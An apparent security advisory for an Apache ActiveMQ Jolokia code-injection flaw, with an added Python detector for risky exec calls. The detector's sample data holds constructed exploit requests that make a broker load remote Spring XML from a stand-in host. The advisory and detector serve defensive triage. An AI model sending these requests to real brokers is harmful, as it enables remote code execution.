Apache · ActiveMQ · CVE-2026-45505
**Name of the Vulnerable Software and Affected Versions**
Apache ActiveMQ (Broker and all other components), all versions prior to 5.19.7
Apache ActiveMQ (Broker and all other components), versions 6.0.0 through 6.2.5
**Description**
Improper input validation and improper control of code generation allow code injection. The broker exposes the Jolokia JMX-over-HTTP bridge at the `/api/jolokia/` endpoint of its web console, and the default Jolokia access policy permits `exec` operations on ActiveMQ MBeans, including `BrokerService.addNetworkConnector(String)` and `BrokerService.addConnector(String)`. An attacker who is authenticated to that endpoint can pass a crafted discovery URI, such as `masterslave:vm://...,...` or `static:vm://...`, whose embedded VM transport URI carries the `brokerConfig` parameter. That parameter makes the VM transport start an embedded broker from the referenced configuration, so a `ResourceXmlApplicationContext` loads a remote, attacker-controlled Spring XML application context. Because singleton beans are instantiated before the configuration is validated, a bean definition that uses a factory method such as `Runtime.exec()` runs arbitrary commands in the broker's JVM before any validation error can stop it.
**Recommendations**
Upgrade Apache ActiveMQ (Broker and all other components) versions prior to 5.19.7 to 5.19.7.
Upgrade Apache ActiveMQ (Broker and all other components) versions 6.0.0 through 6.2.5 to 6.2.6.
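Two things a practitioner will want from this advisory are a check of a deployed version against the two affected ranges above and a way to spot Jolokia `exec` calls that reach the two `BrokerService` operations named in the description, in particular ones whose URI argument carries `brokerConfig=`. The following is an added example and is not code from the Apache ActiveMQ project or from this advisory. It assumes Jolokia traffic is available as (method, path, body) records, for instance from a reverse proxy that logs POST bodies in front of `/api/jolokia/`, and that version strings are plain dotted triples. The sample requests, the `198.51.100.7` host and the `ctx.xml` file name are constructed; the `xbean:` scheme is the one ActiveMQ's `BrokerFactory` uses for XML broker configurations and is not named on this page. The Jolokia GET form (with its `!/` escaping of slashes inside arguments) is handled as well as the JSON POST form, including bulk POSTs that hide one `exec` among harmless reads.

```python
"""Triage helpers for the ActiveMQ Jolokia addConnector/addNetworkConnector issue (added example,
not Apache ActiveMQ project code). Assumes Jolokia requests are available as (method, path, body)
records, e.g. from a reverse proxy logging POST bodies, and that versions are dotted triples."""
import json
import re
from urllib.parse import unquote

FIXED_5X = (5, 19, 7)                  # advisory: all versions prior to 5.19.7 are affected
AFFECTED_6X = ((6, 0, 0), (6, 2, 5))   # advisory: 6.0.0 through 6.2.5, inclusive
RISKY_OPS = {"addConnector", "addNetworkConnector"}   # exec operations the default policy permits
BROKER_MBEAN_PREFIX = "org.apache.activemq:"           # BrokerService MBean domain
BROKERCONFIG_RE = re.compile(r"brokerConfig\s*=", re.IGNORECASE)   # vm:// option that loads Spring XML

def parse_version(text):
    """'5.19.6' -> (5, 19, 6); a qualifier such as '-SNAPSHOT' is ignored."""
    m = re.match(r"^(\d+)\.(\d+)\.(\d+)", text.strip())
    if not m:
        raise ValueError(f"unrecognised ActiveMQ version: {text!r}")
    return tuple(int(x) for x in m.groups())

def is_affected(version):
    """True when the version lies in either affected range stated by the advisory."""
    v = parse_version(version)
    return v < FIXED_5X or AFFECTED_6X[0] <= v <= AFFECTED_6X[1]

def _jolokia_segments(rest):
    """Split a Jolokia GET path on '/', honouring its '!' escape ('!/' = literal '/', '!!' = '!')."""
    segments, current, i = [], [], 0
    while i < len(rest):
        ch = rest[i]
        if ch == "!" and i + 1 < len(rest):
            current.append(rest[i + 1])
            i += 2
            continue
        if ch == "/":
            segments.append("".join(current))
            current = []
        else:
            current.append(ch)
        i += 1
    segments.append("".join(current))
    return segments

def _requests_in(method, path, body):
    """Normalise POST JSON (single or bulk) and the GET path form into Jolokia request dicts."""
    if method.upper() == "POST" and body:
        data = json.loads(body)
        return data if isinstance(data, list) else [data]
    if method.upper() == "GET":
        seg = _jolokia_segments(path.split("/api/jolokia", 1)[1].strip("/"))
        if len(seg) >= 3 and seg[0] == "exec":
            return [{"type": "exec", "mbean": seg[1], "operation": seg[2], "arguments": seg[3:]}]
    return []

def jolokia_findings(method, path, body=None):
    """Flag exec calls reaching BrokerService.addConnector / addNetworkConnector: 'high' when the
    URI argument carries brokerConfig= (remote Spring XML load), 'medium' for any other argument."""
    path = unquote(path)   # the servlet container decodes %3F etc. before Jolokia parses the path
    if "/api/jolokia" not in path:
        return []
    findings = []
    for req in _requests_in(method, path, body):
        if req.get("type") != "exec":
            continue
        op = str(req.get("operation", "")).split("(", 1)[0]   # 'addConnector(java.lang.String)' -> 'addConnector'
        mbean = str(req.get("mbean", ""))
        if op not in RISKY_OPS or not mbean.startswith(BROKER_MBEAN_PREFIX):
            continue
        uri = " ".join(str(a) for a in req.get("arguments", []))
        severity = "high" if BROKERCONFIG_RE.search(uri) else "medium"
        findings.append({"severity": severity, "operation": op, "mbean": mbean, "uri": uri})
    return findings

# Constructed sample traffic, not real logs. 198.51.100.7 is a documentation address; the xbean:
# scheme is what ActiveMQ's BrokerFactory uses for XML broker configs (not named in the advisory).
BROKER = "org.apache.activemq:type=Broker,brokerName=localhost"
EVIL = "brokerConfig=xbean:http://198.51.100.7/ctx.xml"
SAMPLE_REQUESTS = [
    ("POST", "/api/jolokia/", json.dumps({"type": "exec", "mbean": BROKER,
        "operation": "addConnector(java.lang.String)", "arguments": ["static:vm://localhost?" + EVIL]})),
    ("POST", "/api/jolokia/", json.dumps({"type": "exec", "mbean": BROKER,
        "operation": "addConnector", "arguments": ["tcp://0.0.0.0:61617"]})),
    # GET form: '!/' escapes the slashes inside the argument, %3F keeps '?' out of the query string
    ("GET", "/api/jolokia/exec/" + BROKER + "/addNetworkConnector/"
            "masterslave:vm:!/!/localhost%3FbrokerConfig=xbean:http:!/!/198.51.100.7!/ctx.xml", None),
    ("POST", "/api/jolokia/", json.dumps([{"type": "read", "mbean": BROKER, "attribute": "BrokerVersion"},
        {"type": "exec", "mbean": BROKER, "operation": "addNetworkConnector",
         "arguments": ["static:vm://localhost?" + EVIL]}])),
]

def triage(requests=SAMPLE_REQUESTS):
    """Run the detector over (method, path, body) records and return every finding, in order."""
    return [f for method, path, body in requests for f in jolokia_findings(method, path, body)]

if __name__ == "__main__":
    print([(v, is_affected(v)) for v in ("5.18.3", "5.19.7", "6.2.5", "6.2.6")])
    print(*triage(), sep="\n")
```

The `medium` finding for a plain `addConnector` call with a `tcp://` argument is deliberate: adding a listener through Jolokia is an administrative action worth reviewing even when no `brokerConfig=` is present, and alerting only on the exact exploit string would be easy to evade. Run the detector over historical proxy logs covering the window before the upgrade to 5.19.7 or 6.2.6, since valid console credentials are the only precondition the advisory states.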